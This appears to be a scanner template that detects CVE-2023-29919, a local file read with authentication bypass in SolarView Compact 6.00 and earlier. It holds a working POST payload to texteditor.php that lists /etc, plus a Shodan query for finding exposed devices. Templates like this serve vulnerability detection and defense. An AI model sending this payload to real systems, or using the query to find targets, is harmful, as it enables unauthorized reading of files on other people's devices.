id: CVE-2023-29919

info:
  name: SolarView Compact <= 6.00 - Local File Inclusion
  author: For3stCo1d
  severity: high
  verified: true
  description: |
    There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
    shodan-query: http.html:"SolarView Compact"
  reference:
    - https://github.com/xiaosed/CVE-2023-29919
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29919
  tags: cve,cve2023,lfi,solarview,edb
  created: 2023/06/07

rules:
  r0:
    request:
      method: POST
      path: /texteditor.php
      body: directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'action="texteditor.php"') &&
      response.body.bcontains(b'adduser.conf') &&
      response.body.bcontains(b'deluser.conf')
expression: r0()